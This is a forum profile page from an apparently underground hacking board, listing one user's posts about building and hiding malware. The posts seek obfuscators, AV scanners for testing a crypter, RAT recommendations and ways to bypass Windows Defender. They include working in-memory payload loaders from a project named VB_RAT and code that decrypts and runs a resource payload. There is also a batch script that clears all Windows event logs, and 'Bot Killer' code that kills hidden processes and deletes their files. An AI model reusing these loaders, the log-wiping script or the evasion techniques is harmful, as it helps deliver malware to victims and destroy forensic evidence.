Перейти к содержанию


  • Публикаций

  • Зарегистрирован

  • Посещение


26 Excellent

Информация о 1stetcgoldmedal

  • Звание
    Rank №2
  1. Anyone recommend the .NET powerful obfuscator.

    Detect it easy tool or etc I've found a program that doesn't know which obfuscation tool was used without a protector detection. In fact, when I decompiled and looked at the code, I found that it was severely obfuscated. Most function names are \ u0A5D uFFFD \ uE09C \ u0A5D \ uFFFD \ uE09C It was replaced with a character such as, and the error was severe when modifying the class. Can someone actually provide me an open source link to such an obfuscator? Or information. Personally, I think it's good to make it yourself.
  2. Thanks ,Can i hear about the static analysis scanner? http://scanlabs.net https://antiscan.me/ https://spyralscanner.net/ https://metadefender.opswat.com/#!/ https://cyberscan.org/index.php https://avcheck.net/ Is there anything you would recommend or avoid?
  3. Could you please tell me the efficient scanner which is accurate & not overprice? I need an accurate scanner. I'd like to test with my crypter & malware.
  4. Bug on assembly load? Or problem Question

    VB.NET Sub Main() Try Assembly.Load(Convert.FromBase64String("")).EntryPoint.Invoke(Nothing, Nothing) End Catch End Try End Sub C# private static void Main() { try { Assembly.Load(Convert.FromBase64String("")).EntryPoint.Invoke(null, null); } catch { } } Link of native resource & include file exe : https://www.sendspace.com/file/fzlz29 This is example code. You can use base64encoding or io.file.readllbytes or something This is the same code. However, this code does't load the attached file. It doesn't work only in VB.NET. works on C#. The exe file from the compiled VB.NET & C # code. Add a native resource to that file. type 23 name 129 language 1031 Must be added with settings. This ensures that the bin file loads properly. *only in c #.* I'm curious about the reason for this. What I want to load is an include file The include file reads its own native resource. Then decrypt it with a password and run it. You can see the msgbox. * Adding a resource to an include file also works. * My idea is to load the include file with 1.exe and run it. In fact, native resource is added to 1.exe and include file is Run that byte array as a new thread in memory. Long Description & Immature English Skills. Thank you for reading the long article.
  5. How to Extract Native Resource

    How to extract native resource through winapi or other way in vb.net? I tried using reshacker or reseditor, but I noticed that the hash values are different in extracting & adding internal resource values. I don't know the exact reason, but I hope you can tell me how to add & delete & extract & edit native resources in .NET. Try Dim hResInfo As IntPtr = FindResourceEx(New IntPtr(0), New IntPtr(23), New IntPtr(129), 1031) Dim num As UInteger = SizeofResource(New IntPtr(0), hResInfo) Dim source As IntPtr = LockResource(LoadResource(New IntPtr(0), hResInfo)) Dim Data = New Byte(num) {} Marshal.Copy(source, Data, 0, Int(num)) IO.File.WriteAllBytes("DECRPYTED", DecryptBytes(Data)) End Catch ex As Exception MsgBox(ex.ToString) End Try what's my problem.. What I'm trying to do is to compile the native resource of the exe file compiled with C # to vb.net and add the native resource from C # to the vb.net exe. sorry for my bad english
  6. Delete All EventLog batch script

    @echo off FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V IF (%adminTest%)==(Access) goto noAdmin for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G") echo. echo All Event Logs have been cleared! goto theEnd :do_clear echo clearing %1 wevtutil.exe cl %1 goto :eof :noAdmin echo Current user permissions to execute this .BAT file are inadequate. echo This .BAT file must be run with administrative privileges. echo Exit now, right click on this .BAT file, and select "Run as administrator". pause >nul :theEnd Need permission for execute tested win 10 successfully working
  7. C# Botkiller

    using System; using System.IO; using System.Diagnostics; using System.Runtime.InteropServices; using Microsoft.Win32; using System.Security.Principal; // │ Author : NYAN CAT // │ Name : Bot Killer v0.2.6 // │ Contact : https://github.com/NYAN-x-CAT // This program Is distributed for educational purposes only. namespace BotKiller { //Must run 64bit class Program { static void Main() { RunBotKiller(); } public static void RunBotKiller() { foreach (Process p in Process.GetProcesses()) { try { if (Inspection(p.MainModule.FileName)) if (!IsWindowVisible(p.MainWindowHandle)) { RemoveFile(p); } } catch (Exception ex) { Debug.WriteLine("RunBotKiller: " + ex.Message); } } } private static void RemoveFile(Process process) { try { string processName = process.MainModule.FileName; process.Kill(); RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\Run", processName); RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", processName); System.Threading.Thread.Sleep(100); File.Delete(processName); } catch (Exception ex) { Debug.WriteLine("RemoveFile: " + ex.Message); } } private static bool Inspection(string threat) { if (threat == Process.GetCurrentProcess().MainModule.FileName) return false; if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true; if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true; if (threat.Contains("wscript.exe")) return true; if (threat.StartsWith(Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), "Windows\\Microsoft.NET"))) return true; return false; } private static bool IsWindowVisible(string lHandle) { return IsWindowVisible(lHandle); } private static void RegistryDelete(string regPath, string payload) { try { using (RegistryKey key = Registry.CurrentUser.OpenSubKey(regPath, true)) { if (key != null) foreach (string valueOfName in key.GetValueNames()) { if (key.GetValue(valueOfName).ToString().Equals(payload)) key.DeleteValue(valueOfName); } } if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) { using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, true)) { if (key != null) foreach (string valueOfName in key.GetValueNames()) { if (key.GetValue(valueOfName).ToString().Equals(payload)) key.DeleteValue(valueOfName); } } } } catch (Exception ex) { Debug.WriteLine("RegistryDelete: " + ex.Message); } } [DllImport("user32.dll")] [return: MarshalAs(UnmanagedType.Bool)] static extern bool IsWindowVisible(IntPtr hWnd); } } Remove windows invisible program from startup program & remove file & exit
  8. Can anyone tell me about APK Spreading?

    it's need to Crypting for it? Or change application information? Sorry inexperienced English
  9. So, do i use Application.SetCompatibleTextRenderingDefault (false) in Form_Load or where ? can you teaching me ? ..
  10. "Exception has been thrown by the target of an invocation" code : Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load Reflection.Assembly.Load(My.Resources.install).EntryPoint.Invoke(Nothing, New Object() {New String() {Environment.CurrentDirectory}}) End End Sub use applicaion framework & start form : form1 why does this error occur? This error works well when run from the console, not the form. I wonder why this error is happening. Also, when i use "try - catch" to do a msgbox (ex.tostring) This is the message. System.Reflection.TargetInvocationException: The invocation target has thrown an exception. ---> System.InvalidOperationException: SetCompatibleTextRenderingDefault should be called before the first IWin32Window object is created in the application. location: System.Windows.Forms.Application.SetCompatibleTextRenderingDefault (Boolean defaultValue) Location: VB_RAT.My.MyApplication.Main (String [] Args) --- End of internal exception stack trace --- location: System.RuntimeMethodHandle.InvokeMethod (Object target, Object [] arguments, Signature sig, Boolean constructor) location: System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal (Object obj, Object [] parameters, Object [] arguments) location: System.Reflection.RuntimeMethodInfo.Invoke (Object obj, BindingFlags invokeAttr, Binder binder, Object [] parameters, CultureInfo culture) location: System.Reflection.MethodBase.Invoke (Object obj, Object [] parameters) location: T.Form1.Form1_Load (Object sender, EventArgs e) Can someone solve my curiosity? sorry for bad english ...
  11. VB.NET Licence system offline with skgl

    Link : https://www.sendspace.com/file/4z65nx Pass : dedik.cc This file contains only source code. Executable not included. You can also create & remove additional options called "Features".
  12. RAT's

    Quasar = .NET, Remcos C good rat
  13. How to bypass windows defender?

    need to change native ? C / C / Delphi ? For example XOR
  14. How to bypass windows defender?

    I'm trying bypass windows defender at runtime i'm using VB.NET and LoadPE = Assembly.Load RunPE = Public RunPE Payload Encryption Algorithm = AES Using GZIP Compression LoadPE is good but is it Detected all (maybe detect "decryted payload" at runtime) I can Bypass scantime but "Exclude runtime" anyone please teach me method for bypass windows defender? I know powershell method but it is not very usefulI'm trying bypass windows defender at runtime Sorry for my bad english :( ...